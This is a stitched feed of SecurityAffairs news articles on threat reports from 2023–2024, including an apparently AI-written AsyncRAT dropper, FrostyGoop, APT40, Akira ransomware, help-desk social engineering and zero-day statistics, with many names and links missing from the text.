While investigating a malicious email, HP researchers discovered a malware generated by generative artificial intelligence services and used to deliver the malware.
The AI-generated malware was discovered in June 2024, the phishing message used an invoice-themed lure and an encrypted HTML attachment, utilizing to avoid detection. The encryption method stood out because the attacker embedded the AES decryption key in JavaScript within the attachment, which is unusual. Upon decryption, the attachment mimics a website but contains VBScript that acts as a dropper for the AsyncRAT infostealer. The VBScript modifies the Registry, drops a JavaScript file executed as a scheduled task, and creates a PowerShell script that triggers the AsyncRAT payload.
The analysis of the code revealed that the threat actors behind the campaign had commented on almost the entire code. This is unusual among malware authors, as they typically aim to make the analysis of their malicious code more difficult.
!Interestingly, when we analyzed the VBScript and the JavaScript, we were surprised to find that the code was not obfuscated. In fact, the attacker had left comments throughout the code, describing what each line does even for simple functions. Genuine code comments in malware are rare because attackers want to their make malware as difficult to understand as possible.” reads the HP’s “Threat Insights report for Q2 2024. published by HP. “Based on the scripts’ structure, consistent comments for each function and the choice of function names and variables, we think it’s highly likely that the attacker used GenAI to develop these scripts (T1588.007).5 The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints.”
Threat actors have been using generative AI to craft phishing lures, but its use in creating malicious code has been rare. The case described by HP highlights how generative artificial intelligence is accelerating cyberattacks and making it easier for criminals to develop malware.
“The scripts’ structure, comments and choice of function names and variables were strong clues that the threat actor used GenAI to create the malware ().” concludes the report. “The activity shows how GenAI is accelerating attacks and lowering the bar for cybercriminals to infect endpoints.”
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, generative artificial intelligence malware)
]]>Blockchain analysis firm Chainalysis revealed that while overall on-chain illicit activity has decreased by nearly 20% year-to-date, stolen funds and ransomware significantly increased. Stolen funds inflows almost doubled, rising from $857 million to $1.58 billion, and ransomware inflows grew by about 2%, from $449.1 million to $459.8 million.
In 2024, ransomware payments are on track to reach record highs, driven by “big game hunting,” the experts believe that fewer but more high-profile attacks result in larger ransoms. The largest ransom payment recorded this year was to the .
The experts pointed out that the growing trend of increasing ransomware payments is particularly alarming, with both maximum and median payment amounts rising sharply, especially for the most severe ransomware strains. These strains, classified based on their on-chain activity, show a significant increase in median payments, particularly for “very high severity” strains. For instance, the median payment for these strains skyrocketed from $198,939 in early 2023 to $1.5 million by mid-2024, representing a nearly 8-fold increase in just 18 months and a 1200-fold rise since early 2021.
These figures demonstrated that ransomware gangs focus on larger businesses and critical infrastructure.
Despite law enforcement disruptions causing fragmentation in the ransomware ecosystem, crypto adoption has grown, with positive developments like ETF approvals.
Disruptions of the largest ransomware operations, like and , lead to the migration of the affiliates to less effective strains or the rebranding of some operations.
“Whether it be former affiliates of these well-known threat actor operations, or new upstarts, a large number of new ransomware groups have joined the fray, displaying new methods and techniques to carry out their attacks such as expansion in their means for initial access and lateral movement approaches.” said Andrew Davis, general counsel at Kiva Consulting.
“This encouraging sign points to the continued adoption of crypto . Inflows to risky services (made up primarily of mixers and exchanges that do not collect KYC information) are trending higher than they were at this point last year. Meanwhile, aggregate illicit activity fell YTD by 19.6%, dropping from $20.9B to $16.7B, demonstrating that legitimate activity is growing faster than illicit activity on-chain.” the report.
Ransomware attacks have increased by at least 10% this year, according to data from eCrime.ch. Despite this surge and a record high in ransom volumes and maximum payment sizes, the good news is that victims are paying ransoms less frequently. While ransomware incidents posted on leak sites have risen by 10% year-over-year, on-chain data shows a 27.29% decline in actual ransom payments. Summarizing, although more victims are being targeted, fewer are paying.
“The key to disrupting cybercrime is disrupting its supply chains, including attackers, affiliates, partners, infrastructure services providers, launderers, and cashout points.” concludes the report. “Because the operations for crypto heists and ransomware operate almost entirely on the blockchain, law enforcement armed with the right solutions can follow the money to better understand and disrupt these actors’ operations”
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, malware)
]]>In April 2024, Dragos researchers discovered a new ICS malware named FrostyGoop that interacts with Industrial Control Systems using the Modbus protocol. FrostyGoop is the ninth ICS malware that was discovered an that a nation-state actor employed in attacks in the wild.
The experts reported that FrostyGoop was used in a January 2024 attack on a heating company in Lviv, Ukraine. Russia-linked threat actors exploited a vulnerability in a Mikrotik router and left 600 buildings without heat for nearly two days. Dragos started analyzing the FrostyGoop malware in April 2024 and initially thought it was for testing but later confirmed it was used for disruptive purposes. The lack of network segmentation facilitated the attacker’s access to other systems.
The Cyber Security Situation Center linked FrostyGoop to the attack on a Lviv energy company.
“The Cyber Security Situation Center (CSSC), a part of the Security Service of Ukraine (Служба безпеки України), shared details with Dragos of a cyber attack that took place in January 2024. During the late evening on 22 January 2024, through 23 January, adversaries conducted a disruption attack against a municipal district energy company in Lviv, Ukraine.” reads the published by Dragos. “At the time of the attack, this facility fed over 600 apartment buildings in the Lviv metropolitan area, supplying customers with central heating.”
According to the Cyber Security Situation Center (CSSC) of Ukraine, the attackers initially gained access in April 2023 via a Mikrotik router vulnerability, then disrupted heating for 600 buildings for nearly two days.
The researchers reported that the attackers gained access to the district energy company’s network assets using L2TP (Layer Two Tunnelling Protocol) connections from Moscow-based IP addresses.
The threat actors downgraded firmware on ENCO controllers, causing inaccurate readings and heating loss. The attackers used Modbus commands facilitated by poor network segmentation and previously stolen credentials, accessing the system primarily through Tor IP addresses. The attackers did not attempt to destroy the controllers, they only acted to disrupt their operation.
“The victim network assets, which consisted of a Mikrotik router, four management servers, and the district heating system controllers, were not adequately segmented within the network. A forensic examination during the investigation showed that the adversaries sent Modbus commands directly to the district heating system controllers from adversary hosts, facilitated by hardcoded network routes.” continues the report. “The affected heating system controllers were ENCO Controllers. The adversaries downgraded the firmware on the controllers from versions 51 and 52 to 50, which is a version that lacks monitoring capabilities employed at the victim facility, resulting in the Loss of View.”
“FrostyGoop’s ability to communicate with ICS devices via Modbus TCP threatens critical infrastructure across multiple sectors. Given the ubiquity of the Modbus protocol in industrial environments, this malware can potentially cause disruptions across all industrial sectors by interacting with legacy and modern systems.” concludes the report. “The Lviv, Ukraine, incident highlights the need for adequate security controls, including OT-native monitoring. Antivirus vendors’ lack of detection underscores the urgency of implementing continuous OT network security monitoring with ICS protocol-aware analytics to inform operations of potential risks.”
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, ICS malware)
]]>
Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. released a joint advisory warning about the China-linked group (aka TEMP.Periscope, TEMP.Jumper, Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, Kryptonite Panda, Red Ladon, , and Leviathan) and its capability to rapidly exploit disclosed flaws
The China-linked group was able to exploit vulnerabilities within hours or days of the public disclosure.
APT40 has previously targeted organizations in countries like Australia and the United States. The group is able to rapidly adapt vulnerability proofs of concept (POCs) for their operations. They identify new exploits in widely used public software, such as , Atlassian Confluence, and Microsoft Exchange, to target the associated infrastructure.
“APT 40 has previously targeted organizations in various countries, including Australia and the United States. Notably, APT 40 possesses the ability to quickly transform and adapt vulnerability proofs of concept (POCs) for targeting, reconnaissance, and exploitation operations.” . “APT 40 identifies new exploits within widely used public software such as Log4J, Atlassian Confluence and Microsoft Exchange to target the infrastructure of the associated vulnerability.“
In July 2021, the U.S. Justice Department (DoJ) of the cyber espionage group APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan) for hacking tens of government organizations, private businesses and universities around the world between 2011 and 2018.
The APT40 group has been active since at least 2013, it is focused on targeting countries important to the country’s Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).
The group appears to be focused on supporting the naval modernization efforts of the Government of Beijing. Threat actors target engineering, transportation, and defense sectors, experts observed a specific interest in maritime technologies.
The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry. The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.
Three of the defendants are said to be officers in a provincial arm of the MSS and one was an employee of a front company that was used to obfuscate the government’s role in the hacking campaigns.
“APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.” continues the . “APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (), Atlassian Confluence (, ) and Microsoft Exchange (, , ). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.”
APT40 use to exploit vulnerable public-facing infrastructure over other hacking techniques like phishing. They prioritize obtaining valid credentials for subsequent activities. The group often relies on web shells to maintain persistence early in an intrusion. Persistence is established early in an intrusion, making it likely to be observed in all cases, regardless of the level of compromise or further actions taken.
In the past, the APT40 was observed using compromised Australian websites as C2 servers, however he recently evolved this technique.
“APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements.” continues the report.
Many of the compromised SOHO devices are end-of-life or unpatched that can be easily hacked using N-day exploits. Compromised SOHO (Small Office/Home Office) devices provide attackers with a platform to launch attacks by mimicking legitimate traffic.
The report provides details about Tactics, Techniques, and Procesured associated by the the group and detection and mitigation recommendations.
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, China)
]]>
A joint advisory published by CISA, the FBI, Europol, and the Netherlands’ National Cyber Security Centre (NCSC-NL) revealed that since early 2023, operators received $42 million in ransom payments from more than 250 victims worldwide.
The has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.
The Akira ransomware operators implement a double extortion model by exfiltrating victims’ data before encrypting it.
Earlier versions of the ransomware were written in C++ and the malware added the .akira extension to the encrypted files. However, from August 2023 onwards, certain Akira attacks began utilizing Megazord, which employs Rust-based code and encrypts files with a .powerranges extension. Akira threat actors have persisted in employing both Megazord and Akira, including Akira_v2, identified by independent investigations, interchangeably.
The cybersecurity researchers observed threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured. The attackers mostly used Cisco vulnerabilities and .
Akira operators were also observed using external-facing services such as Remote Desktop Protocol (RDP), spear phishing, and the abuse of valid credentials.
Following initial access, threat actors were observed exploiting domain controller’ functions by generating new domain accounts to establish persistence. In some attacks, threat actors created an administrative account named itadm.
“According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting, to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS). Akira threat actors also use credential scraping tools like Mimikatz and LaZagne to aid in privilege escalation.” . “Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes and net Windows commands are used to identify domain controllers and gather information on domain trust relationships.“
Akira operators have been observed deploying two distinct ransomware variants against different system architectures within the same attack. It was this first time that the operators adopted this tactic.
The operators frequently disable security software to evade detection and for lateral movement. The government experts observed the use of PowerTool by Akira threat actors to exploit the Zemana AntiMalware driver and terminate antivirus-related processes.
Threat actors use FileZilla, WinRAR, WinSCP, and RClone for data exfiltration. The attackers use AnyDesk, Cloudflare Tunnel, RustDesk, Ngrok, and Cloudflare Tunnel to communicate with the command-and-control (C&C).
“Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption.” concludes the advisory that includes indicators of compromise (IoCs).”
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, Akira ransomware)
]]>
The U.S. Department of Health and Human Services (HHS) reported that threat actors are carrying out attacks against IT help desks across the Healthcare and Public Health (HPH) sector.
The Health Sector Cybersecurity Coordination Center (HC3) recently observed threat actors using sophisticated social engineering tactics to target IT help desks in the health sector. The attackers aim at gaining initial access to target organizations.
The attacker contacts the target organization’s IT help desk via phone calls from an area code local and claims to be an employee in a financial role. To demonstrate its identity, the threat actor provides the required sensitive information for identity verification, including the last four digits of the target employee’s social security number (SSN) and corporate ID number, along with other demographic details. The attackers likely obtained these details from professional networking sites and via OSINT activities. The threat actor claimed that could not log in or receive MFA tokens because their phone was broken.Then the attacker tricks the IT help desk into enrolling a new device in multi-factor authentication (MFA) to gain access to corporate resources.
Upon gaining initial access to the target organization, the threat actor focuses on obtaining login credentials for payer websites, allowing them to alter ACH details for paying accounts. Then they used compromised employee email accounts to hijack payments.
“After gaining access, the threat actor specifically targeted login information related to payer websites, where they then submitted a form to make ACH changes for payer accounts. Once access has been gained to employee email accounts, they sent instructions to payment processors to divert legitimate payments to attacker-controlled U.S. bank accounts.” . “The funds were then transferred to overseas accounts. During the malicious campaign, the threat actor also registered a domain with a single letter variation of the target organization and created an account impersonating the target organization’s Chief Financial Officer (CFO).”
According to the alert, in some cases, threat actors attempted to leverage AI voice impersonation techniques as part of their social engineering tactics.
A global study mentioned in the alert revealed that 25% of individuals surveyed reported experiencing or knowing someone who fell victim to an AI voice cloning scam,
The alert states that the social engineering techniques described in the report are similar to the ones employed in attacks against an organization in the hospitality and entertainment industry in September 2023. The attacks were attributed to a threat actor known as (also known as ).
The attack aimed at the infection of the target infrastructure with the . However, UNC3944 has yet to claim attacks against the Health sector.
The alert includes mitigations that may be implemented by healthcare organizations to block attacks against IT help desks. Below are some of the actions recommended:
Follow me on Twitter: and and Mastodon
(SecurityAffairs – hacking, IT help desks)
]]>Google’s Threat Analysis Group (TAG) and its subsidiary Mandiant reported that in 2023 97 zero-day vulnerabilities were exploited in attacks, while in 2022 the actively exploited zero-day flaws were 62.
In 2023, Google (TAG) and Mandiant discovered 29 out of 97 vulnerabilities exploited in the wild.
In 2023, the researchers observed 36 zero-day vulnerabilities exploited in the wild targeting enterprise-specific technologies, while 61 vulnerabilities affected end-user platforms and products such as mobile devices, operating systems, browsers, and other applications.
The researchers reported that the investments into exploit mitigations for across browsers and operating systems are impacting the offensive capabilities of threat actors.
Out of the eight in-the-wild zero-day issues targeting Chrome in 2023, none of the vulnerabilities impacted the Document Object Model (DOM) and there were use-after-free issues.
“In 2023 there were no use-after-free vulnerabilities exploited in Chrome for the first time since we began seeing Chrome zero days in-the-wild. Both Chrome and Safari have made exploiting JavaScript Engine vulnerabilities more complex through their V8 heap sandbox and JITCage respectively. Exploits must now include bypasses for these mitigations instead of just exploiting the bug directly.” reads the published by Google TAG.
The researchers reported that Lockdown mode on iOS makes it difficult for attackers to exploit zero-day flaws.
In 2023, the researchers observed a surge in zero-day vulnerabilities in third-party components and libraries that can impact all products that use them.
In 2023, the researchers attributed a combined total of 48 out of 58 zero-day vulnerabilities to (CSVs) and government espionage actors, while 10 zero-day flaws were attributed to financially motivated actors.
The financially motivated threat actors exploited a total of ten zero-day vulnerabilities, and the cybercrime group was one of the most active with the active exploitation of three separate zero-day flaws. The researchers also tracked at least four ransomware groups exploiting four zero-day vulnerabilities.
“FIN11 appears to have invested heavily in zero-day exploitation in the last several years. From late 2020 to early 2021, the group also exploited multiple zero-day vulnerabilities in Accellion’s legacy File Transfer Appliance (FTA), demonstrating a years-long focus by these actors on identifying and exploiting zero-days. Additionally, we tracked the exploitation of four additional zero-day vulnerabilities by four ransomware families in 2023.” continues the report.
The Chinese government made the headlines because government-linked APT groups exploited 12 zero-day vulnerabilities in 2023, which marks a notable increase from seven in 2022.
“While it is near impossible to predict the number of zero-days for 2024, it remains clear that the pace of zero-day discovery and exploitation will likely remain elevated when compared to pre-2021 numbers. Regardless of the number, it is clear that the steps we as security researchers and product vendors are taking are having an impact on attackers. However, we must recognize that our successes will likely manifest as actors increasingly targeting wider and more varied products, as the tried and true methods increasingly become less viable.” concludes the report. “Zero-day exploitation is no longer just a niche capability accessible to only a handful of actors, and we anticipate that the growth we have seen across the last few years will likely continue, as vendors continue to make other avenues of compromise less accessible and as threat actors focus increasing resources on zero-day exploitation.”
Follow me on Twitter: and and Mastodon
(SecurityAffairs – Hacking, zero-day vulnerabilities)
]]>
The 2023 Internet Crime Report published the FBI’s Internet Crime Complaint Center (IC3) reveals that reported cybercrime losses reached $12.5 billion in 2023.
The figure marks a 22% surge in reported losses compared to 2022.
In 2023, the FBI IC3 received a record number of complaints, totaling 880,418, which represents a nearly 10% increase in complaints received compared to 2022.
The report notes that the above figures are conservative concerning cybercrime in 2023, as only a small percentage of victims reported incidents to law enforcement.
According to the report, in 2023 tech support scams and extortion crimes increased, while phishing, non-payment/non-delivery scams, and personal data breach slightly decreased.
The most expensive type of crime monitored by IC3 this year is “investment scams” which increased from $3.31 billion in 2022 to $4.57 billion in 2023 (+38%). The second most costly crime was the (BEC), which caused $2.9 billion in losses. The FBI reports that victims aged 30 to 49 were predominantly affected by investment frauds, whereas the elderly constituted well over half of the losses attributed to tech support scams.
In 2023, IC3 received 2,825 ransomware complaints, resulting in adjusted losses exceeding $59.6 million.
The IC3 reported 1,193 ransomware complaints from organizations within a critical infrastructure sector. Among the 16 critical infrastructure sectors, IC3 reports indicated that 14 sectors had at least one member affected by a ransomware attack in 2023.
The five top ransomware variants reported to the IC3 that affected an organization of a critical infrastructure sector were , , , , and .
“Last year also saw notable achievements for law enforcement. The FBI’s commitment to assisting cyber victims and fostering partnerships allowed for the continued success of IC3’s Recovery Asset Team (RAT). Established in 2018, RAT streamlines communications with financial institutions and FBI field offices to facilitate the freezing of funds for victims.” concludes the report. “In 2023, IC3’s RAT initiated the Financial Fraud Kill Chain (FFKC) on 3,008 incidents, with potential losses of $758.05 million. A monetary hold was placed on $538.39 million, representing a success rate of 71%.”
Follow me on Twitter: and
(SecurityAffairs – hacking, IC3)
]]>
The Five Eyes intelligence alliance issued a joint cybersecurity advisory warning of threat actors exploiting known vulnerabilities in .
The advisory provides details about the exploitation in the wild of Connect Secure and Policy Secure vulnerabilities , , and . Multiple threat actors are chaining these issues to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.
The CISA’s advisory also warns that the Ivanti Integrity Checker Tool is not sufficient to detect a compromise. Government experts also reported that the exploitation of the flaw can allow threat actors to maintain root-level persistence.
“The advisory describes cyber threat actor exploitation of multiple previously identified Connect Secure and Policy Secure vulnerabilities—namely , , and —which threat actors can exploit in a chain to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.” . “Additionally, the advisory describes two key CISA findings:
The advisory includes mitigations and indicators of compromise (IOCs).
Below are the descriptions of the vulnerabilities included in the advisory:
The software firm also addressed the following two additional high-severity vulnerabilities:
“The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.” continues the advisory. “If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.”
In response to the joint advisory and its findings, Ivanti published an update stating that technical findings observed in CISA’s lab have not been observed in real-world scenarios or considered viable in live customer environments. CISA and other government agencies suggest that defenders utilize Ivanti’s recently released external Integrity Checker Tool (ICT), made available on 27th February.
“As part of our exhaustive investigation into the recent attack against our customers, Ivanti and Mandiant released findings today regarding evolving threat actor tactics, techniques and procedures (TTPs). These findings were identified in the ongoing analysis of the previously disclosed vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA gateways, and include potential persistence techniques that we are monitoring, even though to date they have not been deployed successfully in the wild.”
“Importantly, this is not a new CVE, and we and our security and government partners are not aware of any instances of successful threat actor persistence following implementation of security updates and factory resets.“
Follow me on Twitter: and
(SecurityAffairs – hacking, CISA)
]]>
In the ever-shifting digital arena, staying ahead of evolving threat trends is paramount for organizations aiming to safeguard their assets. Amidst this dynamic landscape, email stands as a primary battleground for cyber defense. VIPRE Security Group’s latest report, “Email Security in 2024: An Expert Insight into Email Threats,” delves into the cutting-edge tactics and technologies embraced by cybercriminals this year.
Drawing from an analysis of nearly a billion malicious emails, sheds light on advanced threats, empowering organizations to grasp the intricacies of email-based attacks. Below, we unveil some of the key revelations unearthed in this comprehensive study.
In an exhaustive review, VIPRE processed 7.2 billion emails globally, identifying approximately 950.39 million as malicious.
The VIPRE Email Security Link Isolation feature, akin to URL sandboxing, showcased its efficacy by securing over 41.9 million links clicked by users.
YARA rules were pivotal in detecting millions of malicious attempts spotlighting statistical patterns and malware family indicators. The adaptability of these rules contributed to a marked increase in malware detection, particularly in the fourth quarter, emphasizing the necessity of continuous evolution in email security tactics.
The landscape of email threats continues to evolve, with VIPRE’s report shedding light on several alarming trends:
Phishing remains a dominant tactic in the cybercriminal arsenal, with the email report providing crucial insights:
Techniques Evolve: The majority of phishing attempts (71%) rely on deceptive links, but attachments (22%) and predatory QR codes (7%) are rising phishing tactics to watch out for.
Who’s Being Spoofed?: Microsoft tops the list of spoofed entities, highlighting the importance of vigilance against seemingly reputable sources.
Link and Attachment Tactics
These insights emphasize the critical importance of remaining alert and adopting comprehensive security measures to mitigate the risks posed by the evolving landscape of phishing threats.
The Email Security in 2024 report illuminates several specific threats that have been particularly prominent or are on the rise:
Cybercriminals are exploiting Google Groups to distribute fake order confirmations, tricking recipients into providing personal information under the guise of canceling a non-existent order. This scam cleverly manipulates trust and the routine nature of order confirmations to breach personal security.
The report highlights an uptick in scam emails tied to holidays, leveraging the seasonal hustle to bait users into phishing traps. These scams often use newly registered domains to evade detection, exploiting users’ lowered guard during festive periods.
A significant rise in the use of .eml file attachments for phishing attacks has been noted. These attachments, which can easily bypass traditional security measures due to their rarity in business communication, contain malicious content that, when opened, can compromise the recipient’s security.
The malware landscape has shifted, with families like , Qbot, RedLine, and AgentTesla taking the lead in various quarters. These malware types, particularly targeting Windows systems, highlight the need for vigilance against attachments and links that may harbor such threats.
These highlighted threats underscore the adaptability of attackers and the critical need for advanced, proactive security measures to protect against these sophisticated tactics.
Looking to the horizon of 2024, the Email Security in 2024 Report outlines several key predictions that underscore the evolving nature of email threats:
These predictions highlight the need for continuous innovation in email security solutions and practices to counteract these advancing threats, ensuring that businesses and individuals can safeguard their digital communications against the next wave of cyber attacks.
About the Author: . Having spent her career in various capacities and industries under the “high tech” umbrella, Stefanie is passionate about the trends, challenges, solutions, and stories of existing and emerging technologies. A storyteller at heart, she considers herself one of the lucky ones: someone who gets to make a living doing what she loves. Stefanie is a regular writer at.
Follow me on Twitter: and
(SecurityAffairs – hacking, Email Security)
]]>